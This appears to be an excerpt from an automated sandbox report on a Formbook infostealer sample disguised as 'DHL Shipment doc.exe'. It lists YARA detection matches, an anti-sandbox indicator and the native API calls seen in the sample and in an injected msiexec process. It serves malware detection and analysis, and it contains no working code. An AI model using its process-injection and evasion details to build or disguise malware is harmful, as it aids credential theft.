          Source: 3.2.DHL Shipment doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.DHL Shipment doc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.DHL Shipment doc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.DHL Shipment doc.exe.34817e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 0.2.DHL Shipment doc.exe.3431884.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 3.0.DHL Shipment doc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.DHL Shipment doc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.DHL Shipment doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.DHL Shipment doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.DHL Shipment doc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.DHL Shipment doc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: DHL Shipment doc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 3.0.DHL Shipment doc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.DHL Shipment doc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.DHL Shipment doc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.DHL Shipment doc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.DHL Shipment doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.DHL Shipment doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.DHL Shipment doc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.DHL Shipment doc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.DHL Shipment doc.exe.34817e0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 0.2.DHL Shipment doc.exe.3431884.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 3.0.DHL Shipment doc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.DHL Shipment doc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.DHL Shipment doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.DHL Shipment doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.DHL Shipment doc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.DHL Shipment doc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.738326469.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.941125718.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.804375407.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.689082555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.720424753.0000000006C0D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.940941423.0000000004B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.797281686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.688266335.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.799667944.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.693081041.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 0_2_0190719C0_2_0190719C
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 0_2_0190CE540_2_0190CE54
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 0_2_0190F4560_2_0190F456
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 0_2_0190F4580_2_0190F458
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_00408C8B3_2_00408C8B
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_00408C903_2_00408C90
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_00402D873_2_00402D87
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DCD46611_2_04DCD466
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D1841F11_2_04D1841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD25DD11_2_04DD25DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D1D5E011_2_04D1D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3258111_2_04D32581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD1D5511_2_04DD1D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD2D0711_2_04DD2D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D00D2011_2_04D00D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD2EF711_2_04DD2EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DCD61611_2_04DCD616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D26E3011_2_04D26E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DDDFCE11_2_04DDDFCE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD1FF111_2_04DD1FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD28EC11_2_04DD28EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D1B09011_2_04D1B090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D320A011_2_04D320A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD20A811_2_04DD20A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DC100211_2_04DC1002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DDE82411_2_04DDE824
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D0F90011_2_04D0F900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D2412011_2_04D24120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD22AE11_2_04DD22AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DC03DA11_2_04DC03DA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DCDBD211_2_04DCDBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D3EBB011_2_04D3EBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04DD2B2811_2_04DD2B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00E98C8B11_2_00E98C8B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00E98C9011_2_00E98C90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00E92D8711_2_00E92D87
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00E92D9011_2_00E92D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00E92FB011_2_00E92FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 04D0B150 appears 35 times
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_004185F0 NtCreateFile,3_2_004185F0
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_004186A0 NtReadFile,3_2_004186A0
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_00418720 NtClose,3_2_00418720
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_004187D0 NtAllocateVirtualMemory,3_2_004187D0
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_004185EA NtCreateFile,3_2_004185EA
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_00418642 NtReadFile,3_2_00418642
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_0041869A NtReadFile,3_2_0041869A
          Source: C:\Users\user\Desktop\DHL Shipment doc.exeCode function: 3_2_004187CB NtAllocateVirtualMemory,3_2_004187CB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D495D0 NtClose,LdrInitializeThunk,11_2_04D495D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49540 NtReadFile,LdrInitializeThunk,11_2_04D49540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D496D0 NtCreateKey,LdrInitializeThunk,11_2_04D496D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D496E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_04D496E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49FE0 NtCreateMutant,LdrInitializeThunk,11_2_04D49FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49780 NtMapViewOfSection,LdrInitializeThunk,11_2_04D49780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49710 NtQueryInformationToken,LdrInitializeThunk,11_2_04D49710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49840 NtDelayExecution,LdrInitializeThunk,11_2_04D49840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49860 NtQuerySystemInformation,LdrInitializeThunk,11_2_04D49860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D499A0 NtCreateSection,LdrInitializeThunk,11_2_04D499A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_04D49910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49A50 NtCreateFile,LdrInitializeThunk,11_2_04D49A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D495F0 NtQueryInformationFile,11_2_04D495F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49560 NtWriteFile,11_2_04D49560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D4AD30 NtSetContextThread,11_2_04D4AD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49520 NtWaitForSingleObject,11_2_04D49520
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49650 NtQueryValueKey,11_2_04D49650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49670 NtQueryInformationProcess,11_2_04D49670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49660 NtAllocateVirtualMemory,11_2_04D49660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49610 NtEnumerateValueKey,11_2_04D49610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D497A0 NtUnmapViewOfSection,11_2_04D497A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D4A770 NtOpenThread,11_2_04D4A770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49770 NtSetInformationFile,11_2_04D49770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49760 NtOpenProcess,11_2_04D49760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D4A710 NtOpenProcessToken,11_2_04D4A710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49730 NtQueryVirtualMemory,11_2_04D49730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D498F0 NtReadVirtualMemory,11_2_04D498F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D498A0 NtWriteVirtualMemory,11_2_04D498A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D4B040 NtSuspendThread,11_2_04D4B040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49820 NtEnumerateKey,11_2_04D49820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D499D0 NtCreateProcessEx,11_2_04D499D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49950 NtQueueApcThread,11_2_04D49950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49A80 NtOpenDirectoryObject,11_2_04D49A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49A10 NtQuerySection,11_2_04D49A10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49A00 NtProtectVirtualMemory,11_2_04D49A00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49A20 NtResumeThread,11_2_04D49A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D4A3B0 NtGetContextThread,11_2_04D4A3B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04D49B00 NtSetValueKey,11_2_04D49B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EA85F0 NtCreateFile,11_2_00EA85F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EA86A0 NtReadFile,11_2_00EA86A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EA8720 NtClose,11_2_00EA8720
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EA85EA NtCreateFile,11_2_00EA85EA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EA869A NtReadFile,11_2_00EA869A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00EA8642 NtReadFile,11_2_00EA8642
